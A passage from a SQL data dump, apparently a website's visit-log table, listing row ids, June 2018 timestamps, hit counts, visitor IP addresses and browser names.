1528150486,1,1,0,0,'54.36.149.81','other'),(254310,1528150509,1,1,0,0,'62.205.134.182','other'),(254311,1528150597,1,1,0,0,'54.36.148.151','other'),(254312,1528150657,1,1,0,0,'8.29.198.25','other'),(254313,1528150922,1,1,0,0,'54.36.148.30','other'),(254314,1528150927,1,1,0,0,'54.36.148.47','other'),(254315,1528150959,1,1,0,0,'54.36.149.91','other'),(254316,1528150964,1,1,0,0,'54.236.51.16','other'),(254317,1528151265,1,1,0,0,'54.36.148.36','other'),(254318,1528151330,1,1,0,0,'54.36.149.18','other'),(254319,1528151367,3,3,0,0,'54.165.59.7','other'),(254320,1528151525,1,1,0,0,'54.36.148.222','other'),(254321,1528151552,1,1,0,0,'54.36.148.205','other'),(254322,1528151711,1,1,0,0,'54.36.149.8','other'),(254323,1528151758,1,1,0,0,'54.36.148.114','other'),(254324,1528151946,1,1,0,0,'54.236.51.16','other'),(254325,1528151985,1,1,0,0,'95.67.80.108','chrome'),(254326,1528152139,1,1,0,0,'54.36.148.27','other'),(254327,1528152576,1,1,0,0,'54.36.149.87','other'),(254328,1528152658,1,1,0,0,'54.36.148.128','other'),(254329,1528152660,1,1,0,0,'54.36.148.161','other'),(254330,1528152735,1,1,0,0,'54.36.149.23','other'),(254331,1528152797,1,1,0,0,'54.36.148.135','other'),(254332,1528152889,1,1,0,0,'54.236.51.16','other'),(254333,1528152957,1,1,0,0,'54.36.148.178','other'),(254334,1528153025,1,1,0,0,'54.36.148.120','other'),(254335,1528153051,1,1,0,0,'54.36.148.94','other'),(254336,1528153273,1,1,0,0,'54.36.148.159','other'),(254337,1528153305,1,1,0,0,'54.36.149.11','other'),(254338,1528153565,1,1,0,0,'54.36.149.13','other'),(254339,1528153618,1,0,1,0,'66.249.70.29',''),(254340,1528153786,2,2,0,0,'95.67.80.108','chrome'),(254341,1528153823,1,1,0,0,'54.236.51.16','other'),(254342,1528153937,1,1,0,0,'178.154.171.88','other'),(254343,1528153983,1,1,0,0,'54.36.148.95','other'),(254344,1528154004,1,1,0,0,'54.165.59.7','other'),(254345,1528154046,1,1,0,0,'54.36.148.138','other'),(254346,1528154108,1,1,0,0,'62.205.134.182','other'),(254347,1528154146,1,1,0,0,'54.36.149.26','other'),(254348,1528154285,1,1,0,0,'54.36.148.97','other'),(254349,1528154288,1,1,0,0,'54.36.149.68','other'),(254350,1528154332,1,1,0,0,'54.36.148.103','other'),(254351,1528154622,1,1,0,0,'207.46.13.50','other'),(254352,1528154650,1,1,0,0,'54.36.148.121','other'),(254353,1528154698,1,1,0,0,'141.8.142.74','other'),(254354,1528154759,1,1,0,0,'54.236.51.16','other'),(254355,1528154796,1,1,0,0,'216.244.66.241','other'),(254356,1528154963,1,1,0,0,'193.106.30.99','firefox'),(254357,1528155396,1,1,0,0,'54.36.148.162','other'),(254358,1528155664,1,1,0,0,'54.236.51.16','other'),(254359,1528155799,1,1,0,0,'54.165.59.7','other'),(254360,1528155847,1,1,0,0,'54.36.148.42','other'),(254361,1528155866,1,1,0,0,'8.29.198.25','other'),(254362,1528155886,1,1,0,0,'54.36.148.89','other'),(254363,1528155981,1,1,0,0,'54.36.148.128','other'),(254364,1528156317,1,1,0,0,'54.36.148.193','other'),(254365,1528156326,1,1,0,0,'141.8.142.74','other'),(254366,1528156526,1,1,0,0,'54.36.148.25','other'),(254367,1528156591,1,1,0,0,'54.236.51.16','other'),(254368,1528156903,1,1,0,0,'54.36.148.28','other'),(254369,1528157029,1,1,0,0,'54.36.148.110','other'),(254370,1528157248,1,1,0,0,'54.36.149.9','other'),(254371,1528157414,1,1,0,0,'54.36.149.50','other'),(254372,1528157509,1,1,0,0,'54.236.51.16','other'),(254373,1528157550,1,1,0,0,'54.36.148.212','other'),(254374,1528157630,1,1,0,0,'216.244.66.241','other'),(254375,1528157660,1,1,0,0,'54.36.148.31','other'),(254376,1528157664,1,1,0,0,'54.36.149.8','other'),(254377,1528157709,1,1,0,0,'62.205.134.182','other'),(254378,1528158147,1,1,0,0,'54.36.148.215','other'),(254379,1528158184,1,1,0,0,'54.36.148.158','other'),(254380,1528158424,1,1,0,0,'54.236.51.16','other'),(254381,1528158757,1,1,0,0,'54.36.148.31','other'),(254382,1528158842,1,0,1,0,'66.249.64.28',''),(254383,1528158963,1,1,0,0,'54.36.148.229','other'),(254384,1528159026,1,1,0,0,'54.36.148.234','other'),(254385,1528159078,1,1,0,0,'95.67.80.108','chrome'),(254386,1528159358,2,2,0,0,'54.236.51.16','other'),(254387,1528159675,1,1,0,0,'54.36.148.56','other'),(254388,1528159809,1,1,0,0,'54.36.149.79','other'),(254389,1528159899,1,1,0,0,'157.55.39.29','other'),(254390,1528160032,1,1,0,0,'54.36.148.98','other'),(254391,1528160071,1,1,0,0,'54.36.148.27','other'),(254392,1528160173,1,1,0,0,'54.36.149.5','other'),(254393,1528160252,1,1,0,0,'54.36.148.15','other'),(254394,1528160285,1,1,0,0,'54.236.51.16','other'),(254395,1528160339,4,4,0,0,'216.244.66.241','other'),(254396,1528160443,1,1,0,0,'54.36.148.252','other'),(254397,1528160710,1,1,0,0,'54.36.149.25','other'),(254398,1528160716,1,1,0,0,'54.36.148.121','other'),(254399,1528160831,1,1,0,0,'54.36.148.120','other'),(254400,1528161013,1,1,0,0,'54.36.148.72','other'),(254401,1528161017,1,1,0,0,'54.36.148.248','other'),(254402,1528161083,1,1,0,0,'54.36.148.177','other'),(254403,1528161089,1,1,0,0,'54.36.149.78','other'),(254404,1528161159,1,1,0,0,'54.36.149.93','other'),(254405,1528161202,1,0,1,0,'66.249.64.30',''),(254406,1528161225,1,1,0,0,'54.236.51.16','other'),(254407,1528161308,1,1,0,0,'62.205.134.182','other'),(254408,1528161318,1,1,0,0,'54.36.148.52','other'),(254409,1528161329,2,2,0,0,'95.67.80.108','chrome'),(254410,1528161499,1,1,0,0,'8.29.198.26','other'),(254411,1528161517,1,1,0,0,'54.36.148.80','other'),(254412,1528161531,1,1,0,0,'54.36.148.205','other'),(254413,1528161615,1,1,0,0,'54.36.148.144','other'),(254414,1528161679,1,1,0,0,'216.244.66.241','other'),(254415,1528161852,1,1,0,0,'54.36.149.19','other'),(254416,1528162211,1,1,0,0,'54.236.51.16','other'),(254417,1528162287,1,1,0,0,'54.36.148.140','other'),(254418,1528162533,1,1,0,0,'54.36.148.206','other'),(254419,1528162690,1,1,0,0,'54.36.148.192','other'),(254420,1528162712,1,1,0,0,'54.36.148.135','other'),(254421,1528162734,2,2,0,0,'95.67.80.108','chrome'),(254422,1528162799,2,0,2,0,'66.249.64.28',''),(254423,1528162829,1,1,0,0,'54.36.148.44','other'),(254424,1528163129,1,1,0,0,'54.236.51.16','other'),(254425,1528163222,1,1,0,0,'54.36.148.187','other'),(254426,1528163358,1,1,0,0,'54.36.148.81','other'),(254427,1528163598,1,1,0,0,'54.36.148.52','other'),(254428,1528163729,1,1,0,0,'54.36.149.96','other'),(254429,1528163928,1,1,0,0,'54.36.148.217','other'),(254430,1528164021,1,1,0,0,'54.36.149.43','other'),(254431,1528164066,1,1,0,0,'54.236.51.16','other'),(254432,1528164563,1,1,0,0,'54.36.148.191','other'),(254433,1528164821,1,1,0,0,'54.36.148.96','other'),(254434,1528164855,1,1,0,0,'54.36.148.202','other'),(254435,1528164908,1,1,0,0,'62.205.134.182','other'),(254436,1528164961,1,1,0,0,'54.36.148.46','other'),(254437,1528164976,1,1,0,0,'54.236.51.16','other'),(254438,1528165309,1,1,0,0,'54.36.149.23','other'),(254439,1528165368,1,1,0,0,'54.36.149.83','other'),(254440,1528165639,1,1,0,0,'54.36.149.1','other'),(254441,1528165862,1,1,0,0,'54.36.148.224','other'),(254442,1528165888,1,1,0,0,'54.236.51.16','other'),(254443,1528166222,1,1,0,0,'54.36.149.8','other'),(254444,1528166390,1,1,0,0,'54.36.149.78','other'),(254445,1528166392,1,1,0,0,'54.36.149.83','other'),(254446,1528166698,1,1,0,0,'8.29.198.26','other'),(254447,1528166729,7,7,0,0,'95.67.80.108','chrome'),(254448,1528166799,1,1,0,0,'54.236.51.16','other'),(254449,1528166849,2,2,0,0,'95.213.141.126','opera'),(254450,1528166977,1,1,0,0,'40.77.167.45','other'),(254451,1528167022,1,1,0,0,'54.36.148.69','other'),(254452,1528167234,1,1,0,0,'54.36.148.27','other'),(254453,1528167406,1,1,0,0,'54.36.149.75','other'),(254454,1528167577,1,1,0,0,'54.36.149.106','other'),(254455,1528167578,1,1,0,0,'54.36.149.23','other'),(254456,1528167723,1,1,0,0,'54.236.51.16','other'),(254457,1528168092,1,1,0,0,'54.36.148.111','other'),(254458,1528168218,2,2,0,0,'54.36.148.67','other'),(254459,1528168295,1,1,0,0,'54.36.148.188','other'),(254460,1528168402,1,1,0,0,'54.36.149.19','other'),(254461,1528168507,1,1,0,0,'62.205.134.182','other'),(254462,1528168562,1,1,0,0,'216.244.66.241','other'),(254463,1528168636,1,1,0,0,'54.236.51.16','other'),(254464,1528168659,1,1,0,0,'54.36.148.41','other'),(254465,1528168669,1,1,0,0,'54.36.148.63','other'),(254466,1528168731,2,2,0,0,'54.36.148.78','other'),(254467,1528168766,1,1,0,0,'54.36.149.29','other'),(254468,1528168849,1,1,0,0,'54.36.148.251','other'),(254469,1528168902,1,1,0,0,'54.36.149.39','other'),(254470,1528168928,1,1,0,0,'54.36.148.154','other'),(254471,1528168938,1,1,0,0,'54.36.149.104','other'),(254472,1528169144,1,1,0,0,'74.201.38.18','firefox'),(254473,1528169151,1,1,0,0,'54.36.148.68','other'),(254474,1528169300,1,1,0,0,'54.36.149.76','other'),(254475,1528169386,1,1,0,0,'54.36.148.170','other'),(254476,1528169555,1,1,0,0,'54.236.51.16','other'),(254477,1528169646,1,1,0,0,'54.36.148.34','other'),(254478,1528169996,2,2,0,0,'95.67.80.108','chrome'),(254479,1528170045,1,1,0,0,'54.36.149.101','other'),(254480,1528170064,1,1,0,0,'54.36.148.165','other'),(254481,1528170208,1,1,0,0,'37.204.152.102','msie'),(254482,1528170214,1,1,0,0,'178.154.171.88','other'),(254483,1528170323,1,1,0,0,'66.249.64.30','chrome'),(254484,1528170395,1,1,0,0,'54.36.148.161','other'),(254485,1528170427,1,1,0,0,'54.36.148.174','other'),(254486,1528170461,1,1,0,0,'54.236.51.16','other'),(254487,1528170501,1,1,0,0,'54.36.149.62','other'),(254488,1528170610,1,1,0,0,'95.163.255.113','other'),(254489,1528170618,1,1,0,0,'95.163.255.109','other'),(254490,1528170673,1,1,0,0,'54.36.149.66','other'),(254491,1528170877,1,1,0,0,'54.36.149.35','other'),(254492,1528171056,1,1,0,0,'54.36.149.79','other'),(254493,1528171247,1,1,0,0,'54.36.148.69','other'),(254494,1528171269,1,1,0,0,'216.244.66.241','other'),(254495,1528171370,1,1,0,0,'54.236.51.16','other'),(254496,1528171590,1,1,0,0,'54.36.148.92','other'),(254497,1528171810,1,1,0,0,'54.36.148.89','other'),(254498,1528171843,1,1,0,0,'66.249.64.28','chrome'),(254499,1528172109,1,1,0,0,'62.205.134.182','other'),(254500,1528172290,1,1,0,0,'54.236.51.16','other'),(254501,1528172301,1,1,0,0,'54.36.148.192','other'),(254502,1528172330,1,1,0,0,'8.29.198.26','other'),(254503,1528172364,1,1,0,0,'54.36.148.39','other'),(254504,1528172382,1,1,0,0,'54.36.149.84','other'),(254505,1528172561,1,1,0,0,'54.36.148.114','other'),(254506,1528172563,1,1,0,0,'54.36.149.73','other'),(254507,1528172757,1,1,0,0,'54.36.148.48','other'),(254508,1528173208,1,1,0,0,'54.236.51.16','other'),(254509,1528173395,1,1,0,0,'54.36.148.133','other'),(254510,1528173419,1,1,0,0,'54.36.148.252','other'),(254511,1528173655,1,1,0,0,'54.36.148.62','other'),(254512,1528173667,1,1,0,0,'54.36.149.96','other'),(254513,1528173708,1,1,0,0,'54.36.148.47','other'),(254514,1528173932,1,1,0,0,'216.244.66.241','other'),(254515,1528174122,1,1,0,0,'54.236.51.16','other'),(254516,1528174522,1,0,1,0,'66.249.70.29',''),(254517,1528174603,1,0,1,0,'66.249.64.28',''),(254518,1528175080,1,1,0,0,'54.36.148.183','other'),(254519,1528175105,1,1,0,0,'54.236.51.16','other'),(254520,1528175498,1,1,0,0,'54.36.149.97','other'),(254522,1528175693,1,1,0,0,'54.36.148.89','other'),(254523,1528175710,1,1,0,0,'62.205.134.182','other'),(254524,1528175742,1,1,0,0,'54.36.148.75','other'),(254525,1528175755,1,1,0,0,'54.36.149.4','other'),(254526,1528175756,2,2,0,0,'91.196.177.46','chrome'),(254527,1528176072,1,1,0,0,'54.236.51.16','other'),(254528,1528176085,1,0,1,0,'66.249.64.30',''),(254529,1528176239,1,1,0,0,'88.198.33.145','other'),(254530,1528176396,1,1,0,0,'54.36.149.68','other'),(254531,1528176571,1,1,0,0,'54.36.148.141','other'),(254532,1528176741,3,3,0,0,'95.67.80.108','chrome'),(254533,1528176789,1,1,0,0,'54.36.148.116','other'),(254534,1528176890,1,1,0,0,'54.36.149.58','other'),(254535,1528176992,1,1,0,0,'37.55.77.44','chrome'),(254536,1528177140,1,1,0,0,'54.236.51.16','other'),(254537,1528177206,2,2,0,0,'54.36.149.46','other'),(254538,1528177331,1,1,0,0,'54.36.149.22','other'),(254539,1528177507,2,2,0,0,'91.196.178.85','chrome'),(254540,1528177529,1,1,0,0,'8.29.198.26','other'),(254541,1528177909,1,1,0,0,'54.36.148.236','other'),(254542,1528177931,2,0,2,0,'66.249.64.29',''),(254543,1528177960,1,1,0,0,'54.36.149.54','other'),(254544,1528178003,1,1,0,0,'54.36.148.223','other'),(254545,1528178024,1,1,0,0,'54.36.149.71','other'),(254546,1528178104,1,1,0,0,'54.236.51.16','other'),(254547,1528178164,1,1,0,0,'54.36.149.48','other'),(254548,1528178481,1,1,0,0,'95.67.80.108','chrome'),(254549,1528178519,1,1,0,0,'54.36.148.178','other'),(254550,1528178528,1,1,0,0,'77.111.244.38','chrome'),(254551,1528178529,1,1,0,0,'54.36.148.53','other'),(254552,1528178747,1,1,0,0,'54.36.149.15','other'),(254553,1528178812,1,1,0,0,'54.36.148.130','other'),(254554,1528178854,1,1,0,0,'54.36.148.48','other'),(254555,1528178877,1,1,0,0,'141.8.142.74','other'),(254556,1528179132,1,1,0,0,'37.54.73.229','chrome'),(254557,1528179180,1,1,0,0,'54.236.51.16','other'),(254558,1528179266,1,1,0,0,'54.36.149.41','other'),(254559,1528179309,1,1,0,0,'62.205.134.182','other'),(254560,1528179323,1,1,0,0,'54.36.148.161','other'),(254561,1528179458,2,2,0,0,'91.196.178.85','chrome'),(254562,1528179484,1,1,0,0,'95.135.55.29','chrome'),(254563,1528179585,1,1,0,0,'54.36.149.28','other'),(254564,1528179630,1,1,0,0,'91.196.178.133','chrome'),(254565,1528179635,1,1,0,0,'54.36.148.52','other'),(254566,1528179754,1,1,0,0,'54.36.148.17','other'),(254567,1528179760,1,1,0,0,'54.36.148.76','other'),(254568,1528179832,4,4,0,0,'216.244.66.241','other'),(254569,1528179973,1,1,0,0,'54.36.148.162','other'),(254570,1528180008,1,1,0,0,'54.36.148.10','other'),(254571,1528180075,1,1,0,0,'95.67.80.108','chrome'),(254572,1528180130,1,1,0,0,'54.236.51.16','other'),(254573,1528180149,1,1,0,0,'54.36.148.177','other'),(254574,1528180185,1,1,0,0,'54.36.148.204','other'),(254575,1528180565,1,1,0,0,'54.36.148.135','other'),(254576,1528180589,1,1,0,0,'54.36.149.79','other'),(254577,1528181001,1,1,0,0,'54.36.149.63','other'),(254578,1528181024,2,2,0,0,'95.67.80.108','chrome'),(254579,1528181099,1,1,0,0,'54.236.51.16','other'),(254580,1528181179,1,1,0,0,'54.36.149.33','other'),(254581,1528181366,1,1,0,0,'54.36.148.57','other'),(254582,1528181408,2,2,0,0,'54.36.149.88','other'),(254583,1528181490,1,1,0,0,'54.36.149.14','other'),(254584,1528181631,1,1,0,0,'54.36.149.66','other'),(254585,1528181676,1,1,0,0,'54.36.149.104','other'),(254586,1528181745,1,1,0,0,'54.36.148.167','other'),(254587,1528181810,1,1,0,0,'141.8.142.74','other'),(254588,1528182026,1,1,0,0,'54.236.51.16','other'),(254589,1528182268,1,1,0,0,'54.36.148.247','other'),(254590,1528182297,1,1,0,0,'91.196.178.169','firefox'),(254591,1528182348,2,2,0,0,'195.230.119.59','chrome'),(254592,1528182517,1,1,0,0,'54.36.148.148','other'),(254593,1528182652,1,1,0,0,'91.196.178.169','chrome'),(254594,1528182738,3,3,0,0,'91.196.178.85','chrome'),(254595,1528182772,1,1,0,0,'95.67.80.108','chrome'),(254597,1528182803,1,1,0,0,'54.36.148.145','other'),(254598,1528182908,1,1,0,0,'62.205.134.182','other'),(254599,1528182946,1,1,0,0,'54.236.51.16','other'),(254600,1528183159,1,1,0,0,'8.29.198.25','other'),(254601,1528183166,1,1,0,0,'54.36.148.114','other'),(254602,1528183475,1,1,0,0,'46.200.52.126','chrome'),(254603,1528183657,1,1,0,0,'54.36.148.45','other'),(254604,1528183693,1,1,0,0,'54.36.148.110','other'),(254605,1528183776,1,1,0,0,'54.36.148.236','other'),(254606,1528183853,1,1,0,0,'54.236.51.16','other'),(254607,1528183997,1,1,0,0,'54.36.148.159','other'),(254608,1528184099,5,5,0,0,'95.67.80.108','chrome'),(254609,1528184207,1,1,0,0,'54.36.149.89','other'),(254610,1528184223,1,1,0,0,'54.36.148.222','other'),(254611,1528184346,1,1,0,0,'54.36.148.123','other'),(254612,1528184424,1,1,0,0,'54.36.148.163','other'),(254613,1528184559,1,1,0,0,'141.8.142.74','other'),(254614,1528184595,1,1,0,0,'54.36.148.215','other'),(254615,1528184750,1,1,0,0,'54.36.148.211','other'),(254616,1528184788,1,1,0,0,'54.236.51.16','other'),(254617,1528184975,1,1,0,0,'54.36.148.213','other'),(254618,1528185156,1,1,0,0,'178.154.171.88','other'),(254619,1528185236,1,1,0,0,'54.36.148.219','other'),(254620,1528185258,1,1,0,0,'54.36.148.176','other'),(254621,1528185424,1,1,0,0,'91.196.178.94','firefox'),(254622,1528185495,1,1,0,0,'54.36.148.199','other'),(254623,1528185555,1,1,0,0,'94.231.178.118','chrome'),(254624,1528185590,1,1,0,0,'54.36.148.232','other'),(254625,1528185724,1,1,0,0,'54.236.51.16','other'),(254626,1528185752,4,4,0,0,'88.198.69.233','other'),(254627,1528185791,1,1,0,0,'54.36.149.83','other'),(254628,1528185899,1,1,0,0,'216.244.66.241','other'),(254629,1528185957,1,1,0,0,'54.36.149.80','other'),(254630,1528185961,1,1,0,0,'54.36.149.86','other'),(254631,1528186033,2,2,0,0,'141.8.142.74','other'),(254632,1528186207,1,1,0,0,'54.36.149.77','other'),(254633,1528186227,1,1,0,0,'92.112.125.243','chrome'),(254634,1528186287,3,3,0,0,'95.67.80.108','chrome'),(254635,1528186509,1,1,0,0,'62.205.134.182','other'),(254636,1528186544,1,1,0,0,'95.163.255.94','other'),(254637,1528186637,1,1,0,0,'54.236.51.16','other'),(254638,1528186672,1,1,0,0,'54.36.148.130','other'),(254639,1528186702,1,0,1,0,'66.249.64.131',''),(254640,1528186826,1,1,0,0,'54.36.148.214','other'),(254641,1528187216,3,3,0,0,'95.67.80.108','chrome'),(254642,1528187263,1,1,0,0,'91.196.178.94','firefox'),(254643,1528187338,1,1,0,0,'54.36.148.226','other'),(254644,1528187425,1,1,0,0,'207.46.13.190','other'),(254645,1528187505,1,1,0,0,'54.36.148.39','other'),(254646,1528187563,1,1,0,0,'54.236.51.16','other'),(254647,1528187580,1,1,0,0,'54.36.148.132','other'),(254648,1528187718,1,1,0,0,'54.36.148.126','other'),(254649,1528187735,1,1,0,0,'54.36.149.91','other'),(254650,1528188064,1,1,0,0,'54.36.148.150','other'),(254651,1528188214,1,1,0,0,'54.36.148.18','other'),(254652,1528188360,1,1,0,0,'8.29.198.27','other'),(254653,1528188504,1,1,0,0,'54.236.51.16','other'),(254654,1528188741,1,1,0,0,'54.36.149.12','other'),(254655,1528188884,1,1,0,0,'54.36.148.106','other'),(254656,1528189037,1,0,1,0,'66.249.64.29',''),(254657,1528189038,5,5,0,0,'95.67.80.108','chrome'),(254658,1528189214,1,1,0,0,'46.175.64.62','chrome'),(254659,1528189365,1,1,0,0,'94.179.168.74','firefox'),(254660,1528189562,1,1,0,0,'54.236.51.16','other'),(254661,1528189616,2,2,0,0,'91.196.178.85','chrome'),(254662,1528189817,1,1,0,0,'95.135.202.208','chrome'),(254663,1528189902,1,1,0,0,'54.36.148.153','other'),(254664,1528190109,1,1,0,0,'62.205.134.182','other'),(254665,1528190145,1,1,0,0,'54.36.148.196','other'),(254666,1528190258,1,1,0,0,'54.36.149.11','other'),(254667,1528190333,1,1,0,0,'54.36.148.254','other'),(254668,1528190476,6,6,0,0,'95.67.80.108','chrome'),(254669,1528190486,1,1,0,0,'54.236.51.16','other'),(254670,1528190487,1,1,0,0,'37.52.7.36','chrome'),(254671,1528190545,1,1,0,0,'54.36.148.204','other'),(254672,1528190627,2,2,0,0,'78.111.185.146','chrome'),(254673,1528190978,1,1,0,0,'54.36.148.181','other'),(254674,1528191320,1,1,0,0,'54.36.148.159','other'),(254675,1528191332,1,1,0,0,'54.36.148.196','other'),(254676,1528191367,1,1,0,0,'54.36.148.228','other'),(254677,1528191546,1,1,0,0,'54.36.148.212','other'),(254678,1528191548,4,4,0,0,'95.67.80.108','chrome'),(254679,1528191981,1,1,0,0,'91.196.178.132','chrome'),(254680,1528192099,1,1,0,0,'54.36.148.229','other'),(254681,1528192209,1,1,0,0,'54.36.149.22','other'),(254682,1528192240,1,1,0,0,'54.36.149.69','other'),(254683,1528192405,1,1,0,0,'54.36.148.183','other'),(254684,1528192409,1,1,0,0,'54.236.51.16','other'),(254685,1528192426,1,1,0,0,'54.36.148.45','other'),(254686,1528192431,1,1,0,0,'54.36.148.86','other'),(254687,1528192855,1,1,0,0,'54.36.149.105','other'),(254688,1528192881,1,1,0,0,'54.36.148.155','other'),(254689,1528193223,1,1,0,0,'54.36.148.18','other'),(254690,1528193334,4,4,0,0,'95.67.80.108','chrome'),(254691,1528193491,1,1,0,0,'54.36.148.251','other'),(254692,1528193575,1,1,0,0,'54.36.149.53','other'),(254693,1528193705,1,1,0,0,'54.36.149.8','other'),(254694,1528193709,1,1,0,0,'62.205.134.182','other'),(254695,1528193780,1,1,0,0,'54.36.148.203','other'),(254696,1528193839,1,1,0,0,'91.196.178.102','chrome'),(254697,1528193996,1,1,0,0,'8.29.198.27','other'),(254698,1528194313,2,2,0,0,'91.196.177.46','chrome'),(254699,1528194398,1,1,0,0,'54.36.148.82','other'),(254700,1528194563,1,1,0,0,'141.8.142.74','other'),(254701,1528194661,1,1,0,0,'54.36.149.56','other'),(254702,1528194817,1,1,0,0,'54.36.148.42','other'),(254703,1528194848,1,1,0,0,'95.67.80.108','chrome'),(254704,1528195047,1,1,0,0,'87.250.224.46','other'),(254705,1528195050,1,1,0,0,'54.36.148.147','other'),(254706,1528195090,1,1,0,0,'207.46.13.188','other'),(254707,1528195104,1,1,0,0,'216.244.66.241','other'),(254708,1528195106,1,1,0,0,'54.36.148.154','other'),(254709,1528195144,1,1,0,0,'54.36.149.2','other'),(254710,1528195156,1,1,0,0,'54.36.148.241','other'),(254711,1528195831,1,1,0,0,'54.36.148.232','other'),(254712,1528195834,1,1,0,0,'54.36.148.156','other'),(254713,1528195956,1,1,0,0,'54.36.148.196','other'),(254714,1528196023,1,1,0,0,'37.73.157.77','firefox'),(254715,1528196579,1,1,0,0,'54.36.148.137','other'),(254716,1528196794,1,1,0,0,'54.36.148.81','other'),(254717,1528196935,1,1,0,0,'54.36.149.30','other'),(254718,1528197006,2,2,0,0,'54.165.59.7','other'),(254719,1528197042,1,1,0,0,'54.36.148.95','other'),(254720,1528197177,1,1,0,0,'54.36.148.220','other'),(254721,1528197179,1,1,0,0,'54.36.148.121','other'),(254722,1528197276,1,1,0,0,'162.210.196.100','other'),(254723,1528197309,1,1,0,0,'62.205.134.182','other'),(254724,1528197372,1,1,0,0,'207.46.13.175','other'),(254725,1528197422,1,1,0,0,'54.36.148.164','other'),(254726,1528197445,1,1,0,0,'180.76.15.28','other'),(254727,1528197455,1,1,0,0,'54.36.148.104','other'),(254728,1528197689,2,2,0,0,'216.244.66.241','other'),(254729,1528197709,1,1,0,0,'54.36.148.34','other'),(254730,1528197773,1,1,0,0,'54.36.148.22','other'),(254731,1528197834,1,1,0,0,'54.36.148.15','other'),(254732,1528197896,1,1,0,0,'54.36.148.248','other'),(254733,1528198129,1,1,0,0,'54.165.59.7','other'),(254734,1528198812,1,1,0,0,'54.36.148.55','other'),(254735,1528198973,1,1,0,0,'54.36.148.186','other'),(254736,1528198982,1,1,0,0,'95.67.80.108','chrome'),(254737,1528198987,1,1,0,0,'54.36.148.88','other'),(254738,1528199166,1,1,0,0,'54.36.148.121','other'),(254739,1528199189,1,1,0,0,'8.29.198.27','other'),(254740,1528199198,1,1,0,0,'91.196.178.172','chrome'),(254741,1528199266,1,1,0,0,'54.36.148.248','other'),(254742,1528199326,1,1,0,0,'54.36.148.77','other'),(254743,1528199620,1,1,0,0,'54.36.148.141','other'),(254744,1528200035,1,1,0,0,'54.36.148.126','other'),(254745,1528200091,1,1,0,0,'95.67.80.108','chrome'),(254746,1528200119,1,1,0,0,'54.36.148.78','other'),(254747,1528200128,1,1,0,0,'37.55.77.44','chrome'),(254748,1528200193,1,1,0,0,'54.36.148.95','other'),(254749,1528200351,1,1,0,0,'178.154.171.88','other'),(254750,1528200354,1,1,0,0,'54.36.149.61','other'),(254751,1528200391,1,1,0,0,'54.36.148.169','other'),(254752,1528200514,1,1,0,0,'54.36.149.22','other'),(254753,1528200635,1,1,0,0,'54.36.148.159','other'),(254754,1528200928,1,1,0,0,'62.205.134.182','other'),(254755,1528201354,1,1,0,0,'54.36.148.221','other'),(254756,1528201697,1,1,0,0,'141.8.142.74','other'),(254757,1528202043,2,2,0,0,'95.67.80.108','chrome'),(254758,1528202062,1,1,0,0,'54.36.148.217','other'),(254759,1528202300,1,1,0,0,'54.36.149.9','other'),(254760,1528202402,1,1,0,0,'54.36.148.109','other'),(254761,1528202595,1,1,0,0,'163.172.4.153','firefox'),(254762,1528202631,1,1,0,0,'54.36.149.45','other'),(254763,1528202807,1,1,0,0,'54.36.149.66','other'),(254764,1528202875,1,1,0,0,'54.36.148.195','other'),(254765,1528203084,1,1,0,0,'54.36.149.21','other'),(254766,1528203279,2,2,0,0,'216.244.66.241','other'),(254767,1528203516,1,1,0,0,'54.36.148.61','other'),(254768,1528203828,1,1,0,0,'193.106.30.99','firefox'),(254769,1528203975,1,1,0,0,'54.36.148.106','other'),(254770,1528203977,2,2,0,0,'141.8.142.74','other'),(254771,1528204508,1,1,0,0,'62.205.134.182','other'),(254772,1528204632,1,1,0,0,'216.244.66.241','other'),(254773,1528204693,1,1,0,0,'54.36.149.103','other'),(254774,1528204829,1,1,0,0,'8.29.198.25','other'),(254775,1528204995,1,1,0,0,'54.36.149.59','other'),(254776,1528205187,1,1,0,0,'54.36.149.29','other'),(254777,1528205607,1,1,0,0,'95.179.142.124','chrome'),(254778,1528206002,1,1,0,0,'54.36.148.40','other'),(254779,1528206106,1,1,0,0,'54.36.148.118','other'),(254780,1528206257,2,2,0,0,'91.196.178.169','chrome'),(254781,1528206374,4,4,0,0,'95.67.80.108','chrome'),(254782,1528206553,1,1,0,0,'37.9.113.115','other'),(254783,1528206580,1,1,0,0,'54.36.149.22','other'),(254784,1528206596,1,1,0,0,'54.36.148.165','other'),(254785,1528206827,1,1,0,0,'91.196.178.94','firefox'),(254786,1528207105,1,1,0,0,'54.36.148.161','other'),(254787,1528207180,1,1,0,0,'54.36.148.123','other'),(254788,1528207237,2,2,0,0,'216.244.66.241','other'),(254789,1528207268,1,1,0,0,'54.36.148.230','other'),(254790,1528207376,1,1,0,0,'54.36.149.13','other'),(254791,1528207505,1,1,0,0,'141.8.142.74','other'),(254792,1528207533,3,3,0,0,'91.196.178.67','chrome'),(254793,1528207546,1,1,0,0,'54.36.149.5','other'),(254794,1528207626,1,1,0,0,'54.36.148.157','other'),(254795,1528207662,1,1,0,0,'54.36.148.129','other'),(254796,1528207940,1,1,0,0,'54.36.149.48','other'),(254797,1528207950,1,1,0,0,'54.36.149.18','other'),(254798,1528208009,1,1,0,0,'54.36.148.153','other'),(254799,1528208074,1,1,0,0,'54.36.148.251','other'),(254800,1528208109,1,1,0,0,'62.205.134.182','other'),(254801,1528208115,1,1,0,0,'54.36.148.249','other'),(254802,1528208237,1,1,0,0,'54.36.148.50','other'),(254803,1528208271,1,1,0,0,'54.36.148.69','other'),(254804,1528208287,1,1,0,0,'95.163.255.94','other'),(254805,1528208313,1,1,0,0,'46.42.144.12','firefox'),(254806,1528208413,1,1,0,0,'54.36.149.22','other'),(254807,1528208493,1,1,0,0,'54.36.148.33','other'),(254808,1528208657,1,1,0,0,'178.93.247.40','chrome'),(254809,1528208685,1,1,0,0,'54.36.148.114','other'),(254810,1528208951,2,2,0,0,'167.114.1.124','other'),(254811,1528209127,5,5,0,0,'95.67.80.108','chrome'),(254812,1528209310,1,1,0,0,'54.36.148.228','other'),(254813,1528209378,1,1,0,0,'74.201.38.18','firefox'),(254814,1528209424,1,1,0,0,'54.36.148.212','other'),(254815,1528209470,1,1,0,0,'54.36.149.2','other'),(254816,1528209741,1,1,0,0,'54.36.149.8','other'),(254817,1528209882,2,2,0,0,'176.9.143.190','other'),(254818,1528210020,1,1,0,0,'8.29.198.27','other'),(254819,1528210182,1,1,0,0,'54.36.149.56','other'),(254820,1528210197,1,1,0,0,'95.67.80.108','chrome'),(254821,1528210203,1,1,0,0,'54.36.148.220','other'),(254822,1528210492,1,1,0,0,'54.36.148.27','other'),(254823,1528210670,1,1,0,0,'54.36.148.25','othe